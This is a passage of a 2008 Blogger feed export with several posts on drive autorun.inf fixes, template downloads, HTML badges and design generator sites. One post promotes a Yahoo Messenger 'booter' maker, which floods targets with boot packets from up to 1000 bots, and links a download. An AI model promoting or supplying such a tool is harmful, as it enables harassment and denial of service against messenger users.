href="http://www.blogger.com/feeds/5065270819256037047/posts/default/6428880505333707739" /><link rel="alternate" type="text/html" href="http://gocoders.blogspot.com/2008/09/gcpartner-ads-link-x-change.html" title="gcPartner™ ads Link ex-change" /><author><name>zenal @ zxara</name><uri>http://www.blogger.com/profile/13183076454760333458</uri><email>zxara_project@yahoo.com</email><gd:extendedProperty xmlns:gd="http://schemas.google.com/g/2005" name="OpenSocialUserId" value="14354701094863265331" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">11</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5065270819256037047.post-6487648445245148490</id><published>2008-09-13T19:42:00.014+08:00</published><updated>2008-09-13T23:57:59.221+08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="how2.0" /><category scheme="http://www.blogger.com/atom/ns#" term="download" /><category scheme="http://www.blogger.com/atom/ns#" term="google hack" /><title type="text">how2.0 : Fixing Double-Click Problems In Your Drive</title><content type="html">Cannot double-click your drive? My buddy : &lt;a href="http://adamasalahbarunakcari.blogspot.com/2008/09/open-with.html"&gt;right here have a brief&amp;nbsp;explanation&amp;nbsp;about how to fix it using flash disinfector and CHKDSK&lt;/a&gt;. But here is my solution to fix it within the power of Command Prompt [CMD]&lt;br /&gt;&lt;br /&gt;Several things you must know first :&lt;br /&gt;&lt;br /&gt;1. When you double-click your drive, it can't be accessed and an alert pop-out : "cannot find file.js@file.exe@file.vbs@something similar".&lt;br /&gt;&lt;br /&gt;2. What is the main problems?&lt;br /&gt;Autorun.inf file cannot find the specific file to be executed [been deleted due to virus alert from antivirus software or accidentally deleted]&lt;br /&gt;&lt;br /&gt;3. Autorun.inf usage :&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Not all "autorun.inf" is written to execute the VIRUS.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;"autorun.inf" may also automatically load a programs in the Interactive-CD media.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;It can load a portable software for USB drive such as "PortableApps"&lt;br /&gt;&lt;/li&gt;&lt;li&gt;You can set your drive icon by write some codes in it [will be posted later]&lt;br /&gt;&lt;/li&gt;&lt;li&gt;So, "autorun.inf" is NOT A VIRUS. It's a kinda file that run under System Explorer.&lt;/li&gt;&lt;/ul&gt;Looking by the two main cause of these problems, there is 2 simple solution here:&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-weight: bold;"&gt;1st :&lt;/span&gt;&lt;br /&gt;If you accidentally deleted the files [the programs compiled with "autorun.inf" accidentally deleted] &lt;br /&gt;&lt;span class="Apple-style-span" style="font-style: italic;"&gt;Solution :&lt;/span&gt;&lt;br /&gt;Just unhide the "hidden folder" [tool &amp;gt; folder options &amp;gt; views &amp;gt; "tick" the "show hidden files &amp;amp; folder"]. Then you can delete the "autorun.inf" files [navigate into the drive using the "address bar"]. Your drive can be accessed by using double-click after the comp rebooted.&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-weight: bold;"&gt;2nd :&lt;/span&gt;&lt;br /&gt;If the files compiled with "autorun.inf" have been deleted automatically due to antivirus response to a&amp;nbsp;suspected&amp;nbsp;files, which means, the compiled files with "autorun.inf" is a virus suspected file. So, the virus can't be executed when you double-click the drive. Antivirus won't delete the "autorun.inf" because it is NOT A VIRUS.&lt;br /&gt;&lt;span class="Apple-style-span" style="font-style: italic;"&gt;Solution :&lt;/span&gt;&lt;br /&gt;Open up Command Prompt [start &amp;gt; run &amp;gt; type "CMD"]&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;The command prompt will now open. Type "attrib -s -h -r -a x:\autorun.inf"&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Then type "del x:\autorun.inf"&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-style: italic;"&gt;Explanation&amp;nbsp;:&amp;nbsp;&lt;/span&gt;&lt;br /&gt;"attrib" : attribute&lt;br /&gt;"s" : system file attribute&lt;br /&gt;"h" : hidden&amp;nbsp;file attribute&lt;br /&gt;"r" : read-only&amp;nbsp;file attribute&lt;br /&gt;"a" : archive &amp;nbsp;file attribute&lt;br /&gt;"x" : this should be change with your drive letter such as C or D or any drive you want to fix&lt;br /&gt;"del" : delete file&lt;br /&gt;"-" : this -ve sign stand for remove, so that it will remove the&amp;nbsp;attribute&amp;nbsp;within the files&lt;br /&gt;&lt;br /&gt;So. After you runs the command above, you have successfully remove the "autorun.inf" file in your drive. Just make sure you change the "x" value with your drive letter. Reboot the computer and it's done. Below is a sample advance batch file to remove "autorun.inf" that i've&amp;nbsp;made&amp;nbsp;specially for all my blog reader using these commands above.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;[1KB]&lt;/div&gt;&lt;div style="text-align: center;"&gt;[&lt;a href="http://uploads.bizhat.com/file/329807"&gt;download now&lt;/a&gt;]&lt;/div&gt;&lt;blockquote&gt;I'll post a brief&amp;nbsp;explanation&amp;nbsp;about "autorun.inf" and how to use it later. You may ask me about further&amp;nbsp;explanation&amp;nbsp;about batch [*.bat] file or anything you want to know. I will also post further info about the batch [*.bat] file later.&lt;br /&gt;&lt;/blockquote&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5065270819256037047-6487648445245148490?l=gocoders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://gocoders.blogspot.com/feeds/6487648445245148490/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://gocoders.blogspot.com/2008/09/how20-fixing-double-click-problems-in.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5065270819256037047/posts/default/6487648445245148490" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5065270819256037047/posts/default/6487648445245148490" /><link rel="alternate" type="text/html" href="http://gocoders.blogspot.com/2008/09/how20-fixing-double-click-problems-in.html" title="how2.0 : Fixing Double-Click Problems In Your Drive" /><author><name>zenal @ zxara</name><uri>http://www.blogger.com/profile/13183076454760333458</uri><email>zxara_project@yahoo.com</email><gd:extendedProperty xmlns:gd="http://schemas.google.com/g/2005" name="OpenSocialUserId" value="14354701094863265331" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5065270819256037047.post-5821571033412853766</id><published>2008-09-13T18:50:00.004+08:00</published><updated>2008-09-13T19:06:00.253+08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="download" /><category scheme="http://www.blogger.com/atom/ns#" term="design and templates" /><title type="text">10 "web 2.0" Style Templates</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_VdjeFVKNi6c/SMudxnL52nI/AAAAAAAAAag/MK9wx-ZsKFs/s1600-h/10sample.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/_VdjeFVKNi6c/SMudxnL52nI/AAAAAAAAAag/y_ZeRQD0g8Y/s320-R/10sample.png" /&gt;&lt;/a&gt;&lt;/div&gt;Concern about your page looks? Ok. Here it is. 10 most interesting "web 2.0" style templates. This free templates is designed from a various designer. Credits them if you like it. I've collected this and there's a preview bitmap for every template. Templates including :&lt;br /&gt;&lt;br /&gt;&lt;ol&gt;&lt;li&gt;3 Collum Dark&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Agenda 03&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Chronos&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Enlighten&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Flowersblogger&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Forte&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Freicurv&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Hades 2&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Urban Artist&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Windows Vista&lt;/li&gt;&lt;/ol&gt;&lt;br /&gt;Wait no more. Make use of these. :) And goodluck..&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;[1MB]&lt;/div&gt;&lt;div style="text-align: center;"&gt;[&lt;a href="http://uploads.bizhat.com/file/329683"&gt;download now&lt;/a&gt;]&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5065270819256037047-5821571033412853766?l=gocoders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://gocoders.blogspot.com/feeds/5821571033412853766/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://gocoders.blogspot.com/2008/09/10-web-20-style-templates.html#comment-form" title="2 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5065270819256037047/posts/default/5821571033412853766" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5065270819256037047/posts/default/5821571033412853766" /><link rel="alternate" type="text/html" href="http://gocoders.blogspot.com/2008/09/10-web-20-style-templates.html" title="10 &quot;web 2.0&quot; Style Templates" /><author><name>zenal @ zxara</name><uri>http://www.blogger.com/profile/13183076454760333458</uri><email>zxara_project@yahoo.com</email><gd:extendedProperty xmlns:gd="http://schemas.google.com/g/2005" name="OpenSocialUserId" value="14354701094863265331" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/_VdjeFVKNi6c/SMudxnL52nI/AAAAAAAAAag/y_ZeRQD0g8Y/s72-Rc/10sample.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5065270819256037047.post-1997157699730507278</id><published>2008-09-10T18:20:00.002+08:00</published><updated>2008-09-10T20:20:38.591+08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Yahoo Booter" /><category scheme="http://www.blogger.com/atom/ns#" term="programming" /><category scheme="http://www.blogger.com/atom/ns#" term="hack" /><title type="text">YF Custom Booter Maker Pro V2.0 Public Release</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_VdjeFVKNi6c/SMe7UunliAI/AAAAAAAAAZ4/5BNM2GlamE4/s1600-h/shot_YMbooterCustom.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/_VdjeFVKNi6c/SMe7UunliAI/AAAAAAAAAZ4/Gsvw8kFrHfw/s320-R/shot_YMbooterCustom.png" /&gt;&lt;/a&gt;&lt;/div&gt;Hey!! Something pretty cool here!! Custom Yahoo Booter created by Yahooz Fynest. Nice stuff for those who want to make your own custom booter. Including 13 different stylish skins, 7 types of layouts, 4 types of boot packet with custom message and bootstring. You can also customize your booter "title caption", "site open on exit", "safelist ID", "bot action after booting stopped". Know what?, you can also select your max bot login up to 1000 bot!!. You can find more about this nice application and other cool things in their [&lt;a href="http://yahooz-fynest-inc.com/"&gt;official site here&lt;/a&gt;]&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;[2MB]&lt;/div&gt;&lt;div style="text-align: center;"&gt;[&lt;a href="http://uploads.bizhat.com/file/327094"&gt;download now&lt;/a&gt;]&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5065270819256037047-1997157699730507278?l=gocoders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://gocoders.blogspot.com/feeds/1997157699730507278/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://gocoders.blogspot.com/2008/09/yf-custom-booter-maker-pro-v20-public.html#comment-form" title="2 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5065270819256037047/posts/default/1997157699730507278" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5065270819256037047/posts/default/1997157699730507278" /><link rel="alternate" type="text/html" href="http://gocoders.blogspot.com/2008/09/yf-custom-booter-maker-pro-v20-public.html" title="YF Custom Booter Maker Pro V2.0 Public Release" /><author><name>zenal @ zxara</name><uri>http://www.blogger.com/profile/13183076454760333458</uri><email>zxara_project@yahoo.com</email><gd:extendedProperty xmlns:gd="http://schemas.google.com/g/2005" name="OpenSocialUserId" value="14354701094863265331" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/_VdjeFVKNi6c/SMe7UunliAI/AAAAAAAAAZ4/Gsvw8kFrHfw/s72-Rc/shot_YMbooterCustom.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5065270819256037047.post-3776830481091522531</id><published>2008-09-10T05:28:00.006+08:00</published><updated>2008-09-10T06:56:10.193+08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="how2.0" /><category scheme="http://www.blogger.com/atom/ns#" term="Blogging Tips and Trick" /><category scheme="http://www.blogger.com/atom/ns#" term="tips and trick" /><category scheme="http://www.blogger.com/atom/ns#" term="design" /><title type="text">how2.0 : Put "web 2.0 styles" Badges or Buttons Anywhere at Your Site Page</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_VdjeFVKNi6c/SMbrsUg-P2I/AAAAAAAAAZg/OGtZcsOGE5M/s1600-h/badges_sample.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/_VdjeFVKNi6c/SMbrsUg-P2I/AAAAAAAAAZg/RzmofP5vfgg/s200-R/badges_sample.PNG" /&gt;&lt;/a&gt;&amp;nbsp;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Want to put your own custom badges or buttons at your site? This web2.0 style? Just like this site [eg : pic above]? and make it linked to a site or page? Follow this easy step-by-step tutorial :&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;b&gt;Step 1&lt;/b&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Create your "button" or "badge" image as something like this below :&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_VdjeFVKNi6c/SMbu25TJC6I/AAAAAAAAAZo/XmfWeV1aoNE/s1600-h/learn.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/_VdjeFVKNi6c/SMbu25TJC6I/AAAAAAAAAZo/34FtswbzTsw/s320-R/learn.png" /&gt;&lt;/a&gt;&lt;a href="http://2.bp.blogspot.com/_VdjeFVKNi6c/SMbu-dxwwxI/AAAAAAAAAZw/f1Fnwh8_Yio/s1600-h/newcglayoutFS.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/_VdjeFVKNi6c/SMbu-dxwwxI/AAAAAAAAAZw/MD9BMtX8u1c/s320-R/newcglayoutFS.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Make sure it is &lt;b&gt;[*.gif]&lt;/b&gt; or &lt;b&gt;[*.png]&lt;/b&gt; format because this graphic format support transparent background.[i would suggest *.png format]. Advanced user may create some simple animation too. For someone who did not know how to create it by yourself, you can use [&lt;a href="http://gocoders.blogspot.com/2008/08/portable-easy-gif-animator-v412.html"&gt;Easy GIF Animator&lt;/a&gt;] or using a real time online generator sites that you can find it &lt;a href="http://gocoders.blogspot.com/2008/09/90-most-useful-online-generator-sites.html"&gt;here&lt;/a&gt;. You may also download many of free badges templates [*.psd] &lt;a href="http://www.deviantart.com/#order=9&amp;amp;q=web+badges"&gt;here&lt;/a&gt;.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&amp;nbsp; &lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;b&gt;Step 2&lt;/b&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Uploads your images in any image hosting service like &lt;a href="http://www.photobucket.com/"&gt;Photobucket&lt;/a&gt; or &lt;a href="http://www.tinypic.com/"&gt;Tinypic&lt;/a&gt;. And grab [copy] your image link.Paste the codes somewhere else as it will be used after this step.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;b&gt;Step 3&lt;/b&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Copy &amp;amp; Paste this codes into your &amp;lt; body &amp;gt; tag [i suggest you to full back-up your template first] :&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;/div&gt;&lt;br /&gt;&lt;center&gt;&lt;textarea cols="55" name="readonlycommandfields" readonly="readonly" rows="5"&gt;&amp;lt;div style='position:absolute;left:130px;top:90px;'&amp;gt;&amp;lt;a href='http://www.YourLinkedPage.com'&amp;gt;&amp;lt;img border='0' src='http://YourPhotoHostingServer/YourBadgeOrButton.png'/&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/div&amp;gt;&lt;/textarea&gt;&lt;/center&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;b&gt;Step 4&lt;/b&gt;&lt;/div&gt;&lt;b&gt;[Change Links] &lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;change the &lt;b&gt;"http://www.YourLinkedPage.com"&lt;/b&gt; to the address that you want the badge or button to linked to.&lt;/li&gt;&lt;li&gt;change the &lt;b&gt;"http://YourPhotoHostingServer/YourBadgeOrButton.png"&lt;/b&gt; to your grabbed image link that i was just mention before [last part of Step 2]&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;[Set Image Position]&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;b&gt;&amp;lt; div style='position:absolute;left:130px;top:90px;' &amp;gt;&lt;/b&gt; &lt;/div&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;"left:130px"&lt;/b&gt; : This is the image start position [X-axis]. You may change it to "right" if u want to start the pixel [px] position from the right. Ok. I'll give the example based on my site. &lt;b&gt;"left:130px"&lt;/b&gt; means the image position is 130px from the left hand side of your page. So, set it to the exact px.[preview test mode is the best answer to try to view the result]&lt;/li&gt;&lt;li&gt;&lt;b&gt;"top:90px"&lt;/b&gt; : This is also the image start position [Y-axis]. I suggest u NOT to change the "top". This &lt;b&gt;"top:90px"&lt;/b&gt; means the image position is 90px from the top side of your page. So, just change the [px] value to ur exact value.&lt;/li&gt;&lt;li&gt;The example value that i've give to you is what i used in my page. Change it according to your site page&lt;/li&gt;&lt;/ul&gt;&lt;blockquote&gt;Hope you can find this useful. Good luck to all. You may asked me if you can't understand this how2.0 tutorial :)&lt;/blockquote&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5065270819256037047-3776830481091522531?l=gocoders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://gocoders.blogspot.com/feeds/3776830481091522531/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://gocoders.blogspot.com/2008/09/how20-put-web-20-styles-badges-or.html#comment-form" title="1 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5065270819256037047/posts/default/3776830481091522531" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5065270819256037047/posts/default/3776830481091522531" /><link rel="alternate" type="text/html" href="http://gocoders.blogspot.com/2008/09/how20-put-web-20-styles-badges-or.html" title="how2.0 : Put &quot;web 2.0 styles&quot; Badges or Buttons Anywhere at Your Site Page" /><author><name>zenal @ zxara</name><uri>http://www.blogger.com/profile/13183076454760333458</uri><email>zxara_project@yahoo.com</email><gd:extendedProperty xmlns:gd="http://schemas.google.com/g/2005" name="OpenSocialUserId" value="14354701094863265331" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_VdjeFVKNi6c/SMbrsUg-P2I/AAAAAAAAAZg/RzmofP5vfgg/s72-Rc/badges_sample.PNG" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5065270819256037047.post-7478843583727059572</id><published>2008-09-10T01:11:00.008+08:00</published><updated>2008-09-11T06:13:32.650+08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Weblink" /><category scheme="http://www.blogger.com/atom/ns#" term="News and Information" /><category scheme="http://www.blogger.com/atom/ns#" term="Blogging Tips and Trick" /><category scheme="http://www.blogger.com/atom/ns#" term="web builder" /><title type="text">9.0 Most Useful Online Generator Sites For "Web 2.0" Style</title><content type="html">Below is some of useful sites that create some kind of nice stuff for anyone who want to create a "web2.0" badges,button,templates &amp;amp; others without using any application or design skills.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/_VdjeFVKNi6c/SMbOiG918pI/AAAAAAAAAYY/ITSUyb93Zmg/s320-R/1.png" /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;1. &lt;a href="http://www.web20badges.com/"&gt;http://www.web20badges.com/&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;More than 20 styles of badges can be chosen. Simply by selecting its style, entering your own text, with choose-able color, font and size. Also with adjustable angle. Simply useful :)&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_VdjeFVKNi6c/SMbOlHS-4uI/AAAAAAAAAYg/Wn6zKRMFvmA/s1600-h/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/_VdjeFVKNi6c/SMbOlHS-4uI/AAAAAAAAAYg/VYKiDayJpYU/s320-R/2.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;2. &lt;a href="http://www.mycoolbutton.com/"&gt;http://www.mycoolbutton.com/&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;Create your own custom button design with nice text on it and nice selectable preloaded or uploaded on it.&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_VdjeFVKNi6c/SMbOrBqEpxI/AAAAAAAAAYo/NkGP9RxzVzM/s1600-h/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/_VdjeFVKNi6c/SMbOrBqEpxI/AAAAAAAAAYo/ko6FGUTOdm0/s320-R/3.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-family: 'Lucida Grande'; font-size: 12px; white-space: pre;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;3. &lt;a href="http://www.formstylegenerator.com/"&gt;http://www.formstylegenerator.com/&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;Generates your own CSS styles right on time including background, labels and mouse event too!! There is another more customization for you to play with.&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_VdjeFVKNi6c/SMbOvaTur-I/AAAAAAAAAYw/6B3uxpwE6wg/s1600-h/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/_VdjeFVKNi6c/SMbOvaTur-I/AAAAAAAAAYw/Rui6vYhPmX0/s320-R/4.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-family: 'Lucida Grande'; font-size: 12px; white-space: pre;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;4. &lt;a href="http://www.stripegenerator.com/"&gt;http://www.stripegenerator.com/&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;Create your own web 2.0 Background stripes style here. Simple and great!!&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_VdjeFVKNi6c/SMbOxlQLdDI/AAAAAAAAAY4/74_jNe4P93Q/s1600-h/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/_VdjeFVKNi6c/SMbOxlQLdDI/AAAAAAAAAY4/qN3XC4GqPwc/s320-R/5.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-family: 'Lucida Grande'; font-size: 12px; white-space: pre;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;5. &lt;a href="http://www.gridlayouts.com/"&gt;http://www.gridlayouts.com/&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;The Grid Layout Javascript enables web-developers to stick to a Grid Layout quickly and simply by including the Grid Layouts Javascript file and simple XHTML code&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_VdjeFVKNi6c/SMbO08VXd5I/AAAAAAAAAZA/OjQC1jCkk00/s1600-h/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/_VdjeFVKNi6c/SMbO08VXd5I/AAAAAAAAAZA/xcnl6yxg7D4/s320-R/6.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-family: 'Lucida Grande'; font-size: 12px; white-space: pre;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;6. &lt;a href="http://h-master.net/web2.0/"&gt;http://h-master.net/web2.0/&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;Create reflected style logo in this site. You can also add "beta" tag at your created logo&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_VdjeFVKNi6c/SMbO7uO3VyI/AAAAAAAAAZI/Lc0kFdE_UMw/s1600-h/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/_VdjeFVKNi6c/SMbO7uO3VyI/AAAAAAAAAZI/wFJNtyAuLFs/s320-R/7.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-family: 'Lucida Grande'; font-size: 12px; white-space: pre;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;7. &lt;a href="http://www.web20generator.com/"&gt;http://www.web20generator.com/&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;This page has nearly about customizing everything including rounded corners, gradients, XHTML and CSS, a color scheme , a trendy 'badge', Google Ads, whitespace galore and a big-ass dorky font.&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_VdjeFVKNi6c/SMbPDr9d1_I/AAAAAAAAAZQ/pXqRs18tusY/s1600-h/8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/_VdjeFVKNi6c/SMbPDr9d1_I/AAAAAAAAAZQ/npW8zeewuXA/s320-R/8.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;8. &lt;a href="http://www.webscriptlab.com/"&gt;http://www.webscriptlab.com/&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;This site is really trapping those cool stuff generator inside; "loading gif generator", "favicon generator", "web2.0 domain name generator" and "lookup domain whois".&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_VdjeFVKNi6c/SMbPKBnIuAI/AAAAAAAAAZY/hF6FDDeLFa8/s1600-h/9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/_VdjeFVKNi6c/SMbPKBnIuAI/AAAAAAAAAZY/mIchu9uIZKY/s320-R/9.png" /&gt;&lt;/a&gt;&lt;br /&gt;9. &lt;a href="http://www.stripedesigner.com/"&gt;http://www.stripedesigner.com/&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;Create stripes or use their own stripes, plus a chosen background image. cool!! &lt;/div&gt;&lt;blockquote&gt;&lt;div style="text-align: left;"&gt;p/s : If you didnt want to play around with image editing application [eg:photoshop], this sites may be useful :LoL:) Post me if you knew another cool sites 